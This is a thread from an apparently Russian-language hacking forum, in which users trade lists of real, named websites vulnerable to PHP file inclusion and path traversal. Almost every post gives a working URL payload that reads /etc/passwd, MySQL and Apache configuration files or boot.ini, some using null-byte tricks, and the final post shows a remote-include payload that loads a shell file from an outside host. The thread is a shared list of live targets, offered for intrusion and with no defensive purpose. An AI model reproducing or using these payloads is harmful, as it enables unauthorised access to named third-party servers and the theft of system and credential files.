PHP Иньекции

Discussion in 'Уязвимости' started by Joker-jar, 20 Apr 2007.

  1. ~!DoK_tOR!~

    ~!DoK_tOR!~ Banned

    Joined:
    10 Nov 2006
    Messages:
    673
    Likes Received:
    357
    Reputations:
    44
    Code:
    http://www.provincia.chieti.it/iframe.php?file=/etc/passwd
    http://www.fas-line.net/html/iframe.php?file=/etc/passwd
    http://www.fuomcokozel.com/iframe.php?file=/etc/passwd
    http://www.oldcatholicorthodoxchurch.net/iframe.php?file=/etc/passwd
    
     
  2. .Striker

    .Striker Elder - Старейшина

    Joined:
    11 Nov 2007
    Messages:
    82
    Likes Received:
    63
    Reputations:
    -4
    Code:
    http://www.ipunkt.biz/service/php-downloader/download.php?file=../../../../../../../../../../../etc/passwd
     
    1 person likes this.
  3. BlackSun

    BlackSun Banned

    Joined:
    1 Apr 2007
    Messages:
    989
    Likes Received:
    1,168
    Reputations:
    446
    http://www.guameis.com/home.php?content=../../../../../../../../../../../../../../etc/passwd
    http://www.nedvigimost.com.ua/news.php?num=../../../../../../etc/passwd%00&cat=odnews
    http://www.piling.ru/site/page.php?num=../../../../../../../../../../../../../../../etc/passwd%00
     
    1 person likes this.
  4. .Striker

    .Striker Elder - Старейшина

    Joined:
    11 Nov 2007
    Messages:
    82
    Likes Received:
    63
    Reputations:
    -4
    Sharjah Awqaf General Trust (SAGS)
    Code:
    http://www.awqafshj.com/php/arabic/downloadNewsletter.php?file=../../../../../../../../../../../etc/passwd
     
  5. KPOT_f!nd

    KPOT_f!nd положенец общага

    Joined:
    25 Aug 2006
    Messages:
    1,074
    Likes Received:
    502
    Reputations:
    65
    [​IMG]

    PHP антибоян, собранная вся база с 1 по 70 страницы. Огромное спасибо за помощь Zircool . Работаем теперь по антибояну, за нарушение правил пользователь будет наказан (-) минусом.

     
    1 person likes this.
  6. neon_fx

    neon_fx Elder - Старейшина

    Joined:
    22 Feb 2008
    Messages:
    74
    Likes Received:
    32
    Reputations:
    0
    http://www.mg-protect.ru/index.php?lng=ua&page=../../../../../../../../../../../../../../etc/passwd

    http://station2norfolk.com/home.php?page=../../../../../../../../../../../../../../etc/passwd%00

    http://www.paulevans.name/page.php?page=../../../../../../../../../../../../../etc/passwd%00
     
    #686 neon_fx, 14 May 2008
    Last edited: 14 May 2008
  7. .Striker

    .Striker Elder - Старейшина

    Joined:
    11 Nov 2007
    Messages:
    82
    Likes Received:
    63
    Reputations:
    -4
    http://www.24steps.com/quellcode.php?file=../../../../../../../../../../../etc/passwd
    http://www.centerforcommunityleadership.com/static/centerforcommunityleadership/newsletter.php?file=../../../../../../../../../../../etc/passwd
     
  8. Vid0k

    Vid0k Elder - Старейшина

    Joined:
    24 Dec 2007
    Messages:
    393
    Likes Received:
    125
    Reputations:
    13
    http://www.competeprosper.ca/download.php?file=../../../../../../../etc/httpd/conf/httpd.conf
    http://www.competeprosper.ca/download.php?file=../../../../../../../etc/passwd
    =
    http://www.orlandoedc.com/core/file.php?loc=../../../etc/passwd
    http://www.orlandoedc.com/core/file.php?loc=../../../etc/rc.d/init.d/httpd
    http://www.orlandoedc.com/core/file.php?loc=../../../etc/httpd/conf/httpd.conf
    http://www.orlandoedc.com/core/file.php?loc=../../../proc/version
     
  9. .Striker

    .Striker Elder - Старейшина

    Joined:
    11 Nov 2007
    Messages:
    82
    Likes Received:
    63
    Reputations:
    -4
    Code:
    http://www.mvastro.org/members/newsletter.php?file=../../../../../../../../../../../etc/passwd
     
    1 person likes this.
  10. ~!DoK_tOR!~

    ~!DoK_tOR!~ Banned

    Joined:
    10 Nov 2006
    Messages:
    673
    Likes Received:
    357
    Reputations:
    44
    Code:
    http://www.potpourri-sarl.com/cgi-bin/his-webshop.pl?t=../../../../../../../../etc/passwd%00
    http://www.vastkust-dental.com/cgi-bin/his-webshop.pl?t=../../../../../../../../etc/passwd%00
    
     
    2 people like this.
  11. .Striker

    .Striker Elder - Старейшина

    Joined:
    11 Nov 2007
    Messages:
    82
    Likes Received:
    63
    Reputations:
    -4
    Code:
    http://pes.inf.puc-rio.br/pes06_1_1/cel/aplicacao/showSource.php?file=/etc/my.cnf
    http://pes.inf.puc-rio.br/pes06_1_1/cel/aplicacao/showSource.php?file=/etc/passwd
    
     
  12. Muhacir

    Muhacir Elder - Старейшина

    Joined:
    5 Oct 2006
    Messages:
    91
    Likes Received:
    51
    Reputations:
    -2
    Code:
    http://www.mcmrdd.org/site//modules/FileManager/postlet/uploader.php?inc=../../../../../../../etc/passwd
     
    #692 Muhacir, 20 May 2008
    Last edited: 20 May 2008
    1 person likes this.
  13. .Striker

    .Striker Elder - Старейшина

    Joined:
    11 Nov 2007
    Messages:
    82
    Likes Received:
    63
    Reputations:
    -4
    Code:
    http://www.centerforcommunityleadership.com/static/centerforcommunityleadership/newsletter.php?file=../../../../../../../../../../../etc/passwd
    http://www.centerforcommunityleadership.com/static/centerforcommunityleadership/newsletter.php?file=../../../../../../../../../../../etc/my.cnf
    
     
    1 person likes this.
  14. ~!DoK_tOR!~

    ~!DoK_tOR!~ Banned

    Joined:
    10 Nov 2006
    Messages:
    673
    Likes Received:
    357
    Reputations:
    44
    хз возможно боян PHP антибоян не работает (

    Code:
    http://asiane.byu.edu/arabic/index.php?content=/etc/passwd%00
    http://sophie.byu.edu/resources/index.php?p=../../../../../../../etc/passwd 
    
     
    1 person likes this.
  15. .Striker

    .Striker Elder - Старейшина

    Joined:
    11 Nov 2007
    Messages:
    82
    Likes Received:
    63
    Reputations:
    -4
    Code:
    http://zerowebsites.com/index.php?page=../../../../../../../../../../../etc/passwd
    http://www.precisionelectricllc.com/index.php?page=../../../../../../../../../../../etc/passwd
    
     
  16. OptimaPrime

    OptimaPrime Banned

    Joined:
    30 Mar 2007
    Messages:
    307
    Likes Received:
    588
    Reputations:
    -61
    Code:
    http://www.wiscnews.com/archives/read.php?info=../../etc/passwd 
    http://www.crew4sea.com/indexm.php?url=/etc/passwd 
    http://forum.anime-club.ro/main.php?m=../../../../../etc/passwd%00 
    http://www.sasha.by/doc2.php?page=../../../../../etc/passwd 
    http://abw.by/?act=/etc/passwd%00 
    
     
    2 people like this.
  17. .Striker

    .Striker Elder - Старейшина

    Joined:
    11 Nov 2007
    Messages:
    82
    Likes Received:
    63
    Reputations:
    -4
    Code:
    http://www.just-tea.com.tw/teashop/justtea_wish.php?file=../../../../../../../boot.ini
    
    Microsoft Windows 2000 Professional ))))
     
  18. Dr.Z3r0

    Dr.Z3r0 Leaders of the World

    Joined:
    6 Jul 2007
    Messages:
    284
    Likes Received:
    595
    Reputations:
    567
    Вообщем решил закладки в опере разобрать, бо столько барахла накопилось...

    http://www.3utelecom.com/index.php?include=/etc/passwd
    инклуд, не поддаецо раскручиванию

    http://www.anc.org.za/caucus/index.php?include=index.php
    какаято кривая читалка файлов

    http://sbe.comu.edu.tr/index.php?sosbil=index.php
    локальный инклуд + на сервере сейф мод

    http://ax2.old-cans.com/index.php?include=robots.txt
    локальный инклуд. рядом лежит файл info.php, и вроде как allow_url_fopen=On, но удаленные файлы инклудить отказываецо =\

    http://www.elementalafrica.org.za/index.php?include=index.php
    читалка файлов

    http://www.clan-dl.sk/index.php?include=index.php
    локальный инклуд

    http://www.highqsoft.com/index.php?include=../index.php
    читалго файлов 0_o

    http://www.pnosker.com/index.php?include=.htaccess
    толи читалго, толи инклуд, в подробносте не вдавалсо

    http://kompaktservice.com/index.php?include=index.php
    локальный инклуд

    http://www.flexsys-group.co.uk/index.php?include=.htaccess
    и опять же локальный инклуд

    http://klassenmanagement.com/index.php?include=../../../../../../../../etc/passwd%00
    читалго или инклуд, непомню

    http://www.spa-nyc.com/custompage.php?include=/etc/passwd
    инклудец локальный

    http://www.overseaspropertybroker.com/index.php?include=index
    также локальный инклуд

    http://www.machinery-food.com/index.php?include=/etc/passwd%00
    локальный инклуд

    http://www.wittmann-weingut.de/kk_templates/index.php?INCLUDE=../
    локальный инклуд

    http://www.worldaccessnet.com/index.php?include=../../../../../../../../../../etc/passwd/%00
    локальный инклуд
     
    2 people like this.
  19. Ded MustD!e

    Ded MustD!e Banned

    Joined:
    23 Aug 2007
    Messages:
    392
    Likes Received:
    694
    Reputations:
    405
    http://www.kiva.org/ PR:7
     
    1 person likes this.
  20. КВР

    КВР Elder - Старейшина

    Joined:
    23 Apr 2008
    Messages:
    16
    Likes Received:
    30
    Reputations:
    -2
    myphpbb.com.ru
    http://myphpbb.com.ru/?q=sinc/sconfig.dat&c=include('http://www.ru/shell.txt');die();